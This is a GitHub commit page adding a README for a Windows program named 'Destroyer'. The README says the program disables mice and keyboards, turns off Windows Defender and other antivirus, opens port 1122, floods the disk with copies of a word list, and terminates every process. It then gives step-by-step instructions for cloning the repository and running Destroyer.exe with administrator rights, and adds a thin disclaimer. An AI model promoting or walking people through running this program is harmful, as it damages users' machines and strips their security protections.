-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
5 changed files
with
61 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1,54 @@ | ||
# Destroyer | ||
|
||
## What is it? | ||
|
||
Destroyer is a programm which: | ||
- Temporarily disables all of the mices and keyboards connected to your pc | ||
- It opens ShutNet [You can download it here](https://github.com/INeddHelp/ShutNet) | ||
- Duplicates over and over again the file words_alpha.txt download from [here](https://github.com/dwyl/english-words) | ||
- Turns into a toast the Windows defender and every other anti-virus programs on Windows | ||
- Opens the port 1122 | ||
- Terminates every process on the pc | ||
|
||
## How can I use it? | ||
|
||
### How to check if you have git installed | ||
- Open the terminal | ||
- - Run | ||
``` | ||
git --version | ||
``` | ||
If it prints out an error, go [here](https://github.com/INeddHelp/Destroyer#if-you-do-not-have-git-installed) | ||
else, go [here](https://github.com/INeddHelp/Destroyer#if-you-have-git-installed) | ||
|
||
### If you do not have git installed | ||
|
||
- Download git from [here](https://git-scm.com/download/win) | ||
- Open the terminal | ||
- Navigate to the Downloads | ||
``` | ||
cd Downloads | ||
``` | ||
- and run this last command | ||
``` | ||
name-of-the-file-download.exe /SILENT | ||
``` | ||
After the installation is completed, go [here](https://github.com/INeddHelp/Destroyer#if-you-have-git-installed) | ||
|
||
### If you have git installed | ||
|
||
- Open the terminal | ||
- Navigate to the desktop | ||
``` | ||
cd Desktop | ||
``` | ||
- Type in | ||
``` | ||
git clone https://github.com/INeddHelp/Destroyer.git | ||
``` | ||
- After that's done, open the downloaded folder and seek the file Destroyer.exe | ||
- - Right click on it and run it with administrative privilages | ||
|
||
Enjoy! | ||
|
||
P.S. THIS PROGRAM IS NOT MEANT TO DAMAGE ANY DEVICE. YOU IT WITH CAUSION. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters